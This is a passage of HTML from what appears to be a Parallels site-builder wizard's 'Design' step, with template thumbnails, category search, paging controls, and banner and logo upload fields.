<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_design_abullet.gif"></td>
<td class="sb-steps-text-active" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_abg.gif);">Design</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_ar.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Pages');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_pages_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Pages</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Edit');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_edit_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Edit</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" onclick="return sbNavigationObject.go('/Wizard/Publish');" style="cursor: pointer;"><tr>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);padding-left:5px;padding-right:3px;"><img src="/skins/WinXPReloadedCompact/images/steps_publish_bullet.gif"></td>
<td class="sb-steps-text" style="padding: 0 5px 0 2px; background-image:url(/skins/WinXPReloadedCompact/images/steps_bg.gif);white-space:nowrap;">Publish</td>
<td><img src="/skins/WinXPReloadedCompact/images/steps_separator_right.gif"></td>
</tr></table></td>
</tr></table></td>
<td align="right" class="sb-header-company-logo"><img style="cursor: pointer" onclick="window.open('http://www.parallels.com', '_new'); return false;" border="0" src="/skins/WinXPReloadedCompact/images/def_parallels_logo_wizard.gif"></td>
</tr></table></td></tr></table>
<table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-header-bottom"><tr>
<td style="padding-left: 10px;">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       " class="" id="saveChangesButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/button_middle.gif);padding-left:5px;padding-right:5px;" class=""><img src="/skins/WinXPReloadedCompact/icons/save_icon.gif"></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="saveChangesButtonMainText">Save Changes</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript">
                           sbApplyChangesObject.addListener(enableSaveChangesButton);
                       </script>
</td>
<td style="padding-left: 10px; width: 100%;" onclick="sb_status.showDetails();" id="StatusBar">
<table cellpadding="0" cellspacing="3" width="100%" border="0" style="display:inline-block;width:100%;"><tr>
<td valign="middle"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_help.gif"></td>
<td valign="middle" width="100%" style="padding-left: 10px;"><div id="StatusMessage" class="sb-statusbar-text">Select a template for your site. You can also customize certain elements and upload your logo.</div></td>
</tr></table>
<script type="text/javascript" language="javascript" src="/js/Wizard/Status.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
                       sb_status = new SB_Status('/skins/WinXPReloadedCompact');
                       </script>
</td>
<td class="sb-header-bottom-right"><table cellspacing="0" cellpadding="0" border="0" style="height: 100%;"><tr><td><a style="text-decoration: none" onclick="javascript:try{window.open('http://download1.parallels.com/PPSMBE/10.0.0/Doc/help.htm?locale=en-US&amp;article=/Wizard/Design&amp;help_type=user','_blank')}catch(e){}; void(0);" href="#"><table cellpadding="0" cellspacing="0" border="0" type="button" style="height:100%;"><tr>
<td style="padding: 5px;"><img style="border-width:0px;" width="16" height="16" src="/skins/WinXPReloadedCompact/icons/help.png"></td>
<td class="sb-tools-text" style="padding-right:10px;">Help</td>
</tr></table></a></td></tr></table></td>
</tr></table>
</td></tr>
<tr><td class="sb-wizard-layout-content">
<script language="javascript">
       customHeaderUrl = '/sites/78/78806f0057ebcbb04597bd12795bd6a6/customImages/header';
       customLogoUrl = '/sites/78/78806f0057ebcbb04597bd12795bd6a6/customImages/logo';
       customHeaders = new Array(
       
       );
       customLogo = '';
       </script><script src="/js/Wizard/Design.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript">
           function checkBrowserSize() {checkSize('This window size is too small for this application. Correct work is not guaranteed.');}attachCheckToResize();sb_design=new SB_Design('/templates');
           RegisterOnloadAction('resizeDivContent()');
       </script><table border="0" cellpadding="0" cellspacing="0" class="sb-wizard-content-block"><tr>
<td class="sb-wizard-content-templates"><table cellpadding="0" cellspacing="0" border="0" class="sb-wizard-content-templates-block">
<tr><td class="sb-wizard-content-templates-categories"><table cellpadding="0" cellspacing="0" border="0" class="sb-wizard-content-templates-categories-block"><tr>
<td><span class="sb-wizard-content-templates-categories-category-text">Category</span></td>
<td><select id="category" onchange="sb_design.searchCategory(this.value);return false;"><option value="-1" selected>All categories</option>
<option value="3">Art and Photography</option>
<option value="2">Blog</option>
<option value="6">Business</option>
<option value="4">Fashion</option>
<option value="8">Food and Drink</option>
<option value="5">Jewelry</option>
<option value="1">Personal</option>
<option value="7">Photogallery</option>
<option value="9">Sport</option></select></td>
<td><div class="sb-wizard-content-templates-categories-category-separator"><span></span></div></td>
<td><span class="sb-wizard-content-templates-categories-search-text">Search</span></td>
<td>
<input type="text" size="60" maxlength="255" class="sb-input" id="search" name="search"><script type="text/javascript" language="javascript"><!--
                       sb_design.prepareSearchInput();
                   //--></script>
</td>
<td><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 60px;" class="sb-wizard-content-templates-categories-search-go" id="" onclick="sb_design.searchSubstring(document.getElementById('search').value);"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Go!</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 60px;" class="sb-wizard-content-templates-categories-search-show-block" id="" onclick="sb_design.showAllTemplates();"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Show All</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
</tr></table></td></tr>
<tr><td class="sb-wizard-content-templates-thumbnails" id="outerTemplateListContainer">
<input type="hidden" value="divTemplateList,190" name="inputResizeOption" id="inputResizeOption"><div style="overflow: auto; width: 100%; height: 423px;" id="divTemplateList"><span style="width: 100%;"><span style="padding: 5px; float: left; width: 270px;"><table cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td valign="top" height="248" align="center" style="border: 2px solid rgb(255, 61, 12);">
<table cellspacing="0" cellpadding="0" border="0"><tr><td valign="top" align="center" style="padding: 3px 7px 2px;"><img border="0" id="smallPreview" style="cursor: pointer; width: 252px; height: 189px;" onclick="sb_design.previewBigIcon();"></td></tr></table>
<div style="text-align: left; width: 260px; overflow: hidden;"><table cellspacing="0" cellpadding="0" border="0">
<tr><td align="left" valign="top" style="padding-left: 7px; padding-right: 7px; padding-bottom: 2px; ">
<b class="sb-text">ID:</b><span id="labelIdContent" class="sb-text" style="padding-left: 5px;"></span>
</td></tr>
<tr><td align="left" valign="top" style="padding-left: 7px; padding-right: 7px; padding-bottom: 3px;">
<span style="font-weight: bolder;">Category:</span><span id="labelCategoryContent" style="padding-left: 5px;"></span>
</td></tr>
<tr><td align="left" valign="top" style="padding-left: 7px; padding-right: 7px; padding-bottom: 2px;">
<span style="font-weight: bolder;">Keywords:</span><span id="labelKeywordsContent" style="padding-left: 5px;">none</span>
</td></tr>
</table></div>
</td></tr>
<tr><td align="right" valign="top"><table cellpadding="0" cellspacing="0" width="100%" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/design_button_selected_left.gif" style="border-width:0px;"></td>
<td width="100%" valign="middle" align="center" nowrap background="/skins/WinXPReloadedCompact/images/design_button_selected_m.gif" onclick="sb_design.previewBigIcon();" class="sb-text" style="cursor:pointer;color:White;">PREVIEW</td>
<td><img src="/skins/WinXPReloadedCompact/images/design_button_selected_r.gif" style="border-width:0px;"></td>
</tr></table></td></tr>
</table></span><input type="hidden" value="" name="activeTemplate" id="activeTemplate"><input type="hidden" value="" name="activeColorScheme" id="activeColorScheme"><input type="hidden" value="" name="activeHeader" id="activeHeader"><input type="hidden" value="" name="activeButton" id="activeButton"><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'art_and_photography-001'
           , 'green'
           , 'green|violet|blue'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Art and Photography'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_art_and_photography-001"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/art_and_photography-001/green/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">art_and_photogr..
                                               </span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'art_and_photography-002'
           , 'blue'
           , 'green|yellow|blue'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3|headers4'
           , 'buttons1|buttons2|buttons3'
           , 'Art and Photography'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_art_and_photography-002"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/art_and_photography-002/blue/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">art_and_photogr..
                                               </span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'art_and_photography-003'
           , 'red'
           , 'pink|red|blue'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Art and Photography'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_art_and_photography-003"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/art_and_photography-003/red/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">art_and_photogr..
                                               </span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'av-099'
           , 'blue'
           , 'blue|red|yellow'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Photogallery'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_av-099"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/av-099/blue/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">av-099</span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'av-139'
           , 'blue'
           , 'blue|green|orange'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Personal'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_av-139"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/av-139/blue/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">av-139</span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'av-141'
           , 'blue'
           , 'blue|green|red'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Food and Drink'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_av-141"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/av-141/blue/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">av-141</span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'av-169'
           , 'blue'
           , 'blue|red|yellow'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Business'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_av-169"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/av-169/blue/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">av-169</span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'av-234'
           , 'green'
           , 'green|red|blue'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Business'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_av-234"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/av-234/green/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">av-234</span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'av-239'
           , 'yellow'
           , 'yellow|red|blue'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Sport'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_av-239"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/av-239/yellow/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">av-239</span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'eug-29'
           , 'green'
           , 'green|purple|bule'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Fashion'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_eug-29"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/eug-29/green/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">eug-29</span>
</div></td></tr>
</table></td></tr></table></span><span style="padding: 5px; float: left; width: 130px;"><table cellspacing="0" cellpadding="0" border="0" align="center" style="cursor: pointer;" onclick="
       sb_design.selectNewTemplate(
           'personal-018'
           , 'green'
           , 'green|red|blue'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1|headers2|headers3'
           , 'buttons1|buttons2|buttons3'
           , 'Personal'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   return false;"><tr><td valign="top" align="center" style="border: 1px solid rgb(204, 204, 204);" id="template_personal-018"><table cellspacing="0" cellpadding="0">
<tr><td valign="top" align="center" style="padding: 5px 5px 10px;"><img style="border-width: 0px; height: 89px; width: 118px;" src="/templates/personal-018/green/icon.gif"></td></tr>
<tr><td valign="top" align="left" style="padding-left: 5px; padding-right: 5px; padding-bottom: 10px; white-space: nowrap;"><div style="width: 118px; overflow: hidden;">
<b class="sb-text">ID:</b><span class="sb-text" style="padding-left: 5px;">personal-018</span>
</div></td></tr>
</table></td></tr></table></span></span></div>
</td></tr>
<tr><td class="sb-wizard-content-templates-pager"><table cellspacing="0" cellpadding="0" border="0" class="sb-wizard-content-templates-pager-block"><tr>
<td>Templates per page:..

                       <a href="#" onclick="sb_design.changeTemplatesPerPage(11);" class="sb-pager-link">11</a>..
                       <a href="#" onclick="sb_design.changeTemplatesPerPage(26);" class="sb-pager-link">26</a>..
                       <a href="#" onclick="sb_design.changeTemplatesPerPage(50);" class="sb-pager-link">50</a>..
                       <a href="#" onclick="sb_design.changeTemplatesPerPage(sb_design.getBestFitTemplatesNumber());" class="sb-pager-link">Best fit</a>
</td>
<td><div class="sb-wizard-content-templates-pager-separator"><span></span></div></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 60px; opacity: 0.4; cursor: default;" class="" id="" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="sb-button-disabled" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">&lt;</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
<td><span class="sb-wizard-content-templates-pager-page-text">Page 1 of 3</span></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 60px; cursor: pointer;" class="" id="" onclick="sb_design.goToPage(2);"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">&gt;</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
<td><div class="sb-wizard-content-templates-pager-separator"><span></span></div></td>
<td>
<span class="sb-wizard-content-templates-pager-go-text">Go to page</span><input type="text" class="sb-input sb-wizard-content-templates-pager-input" size="2" id="goToPage"><span style="color: Red; visibility: hidden;"></span>
</td>
<td>
<table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 60px; cursor: pointer;" class="" id="" onclick="sb_design.validateAndGoToPage(document.getElementById('goToPage').value, 3);"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Go!</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<script type="text/javascript" language="javascript"><!--
                                       sb_design.prepareGoToPageInput(3);
                                   //--></script>
</td>
</tr></table></td></tr>
</table></td>
<td class="sb-wizard-content-settings"><table cellpadding="0" cellspacing="0" border="0" class="sb-wizard-content-settings-block"><tr><td class="sb-wizard-content-settings-block-inner">
<div class="sb-wizard-content-settings-title"><span class="sb-wizard-content-settings-title-text">Color schemes</span></div>
<span id="colorSchemesList"></span><div class="sb-wizard-content-settings-separator"><span></span></div>
<div class="sb-wizard-content-settings-title"><span class="sb-wizard-content-settings-title-text">Banners</span></div>
<input type="hidden" name="headersList_hidden" id="headersList_hidden" value="false"><table cellpadding="0" cellspacing="0" border="0" class="sb-wizard-content-settings-banners" id="headersList">
<tr><td class="sb-wizard-content-settings-banners-thumbnails"><table cellpadding="0" cellspacing="0" id="headerSelectionCombobox" class="sb-wizard-content-settings-banners-thumbnails-block" onclick="sb_design.showHeadersList(document.getElementById('headersList'));">
<tr>
<td class="sb-wizard-content-settings-banners-thumbnails-current"><table cellspacing="0" cellpadding="0" border="0" style="width:100%;border-collapse:collapse;"><tr><td align="center" id="selectedHeader" valign="middle" style="background-color:White;width:100%;">
                                           ..
                                       </td></tr></table></td>
<td class="sb-wizard-content-settings-banners-thumbnails-drop"><img src="/skins/WinXPReloadedCompact/images/DropDownMiddle.gif" style="border-width:0px;"></td>
</tr>
<tr><td><div id="headersList_popup" class="sb-wizard-content-settings-banners-thumbnails-alternative"></div></td></tr>
</table></td></tr>
<tr><td class="sb-wizard-content-settings-banners-upload"><table cellpadding="0" cellspacing="0" border="0" class="sb-wizard-content-settings-banners-upload-block"><tr>
<td class="sb-wizard-content-settings-banners-upload-input-block"><input type="file" size="17" maxlength="255" class="sb-input" id="customHeader" name="customHeader"></td>
<td class="sb-wizard-content-settings-banners-upload-button-block"><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 70px; cursor: pointer;" class="" id="headerUploadButton" onclick="sb_design.submitHeaderUploadForm('customHeader');"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="headerUploadButtonMainText">Upload</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
</tr></table></td></tr>
</table>
<div class="sb-wizard-content-settings-separator"><span></span></div>
<div class="sb-wizard-content-settings-title"><span class="sb-wizard-content-settings-title-text">Menu styles</span></div>
<span id="buttonsList"></span><div class="sb-wizard-content-settings-separator"><span></span></div>
<div class="sb-wizard-content-settings-title"><span class="sb-wizard-content-settings-title-text">Logo</span></div>
<table cellpadding="0" cellspacing="0" border="0" class="sb-wizard-content-settings-logo">
<tr><td class="sb-wizard-content-settings-logo-control"><table cellspacing="0" cellpadding="0" border="0" class="sb-wizard-content-settings-logo-control-block"><tr>
<td class="sb-wizard-content-settings-logo-control-thumbnail"><table cellpadding="0" cellspacing="0" border="0" class="sb-wizard-content-settings-logo-control-thumbnail-block" style="width: 55px;"><tr><td id="templateLogo" class="sb-wizard-content-settings-logo-control-thumbnail-block-inner" style="height: 53px;"></td></tr></table></td>
<td class="sb-wizard-content-settings-logo-control-restore">
<input type="hidden" name="isLogoReseted" id="isLogoReseted" value="no"><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 70px;" class="sb-button sb-wizard-content-settings-logo-control-restore" id="" onclick="sb_design.setDefaultLogo();"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Restore Default</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
</td>
<td class="sb-wizard-content-settings-logo-control-clear">
<input type="hidden" name="isLogoDeleted" id="isLogoDeleted" value="no"><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 70px; cursor: pointer;" class="" id="" onclick="sb_design.setEmptyLogo();"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Clear</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
</td>
</tr></table></td></tr>
<tr><td class="sb-wizard-content-settings-logo-upload"><table cellspacing="0" cellpadding="0" class="sb-wizard-content-settings-logo-upload-block"><tr>
<td class="sb-wizard-content-settings-logo-upload-input-block"><input type="file" size="17" maxlength="255" class="sb-input" id="customLogo" name="customLogo"></td>
<td class="sb-wizard-content-settings-logo-upload-button-block"><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;width: 70px; cursor: pointer;" class="" id="" onclick="sb_design.submitLogoUploadForm('customLogo');"><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Upload</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
</tr></table></td></tr>
</table>
<div class="sb-wizard-content-settings-separator"><span></span></div>
<div class="sb-wizard-content-settings-title"><span class="sb-wizard-content-settings-title-text">Site info</span></div>
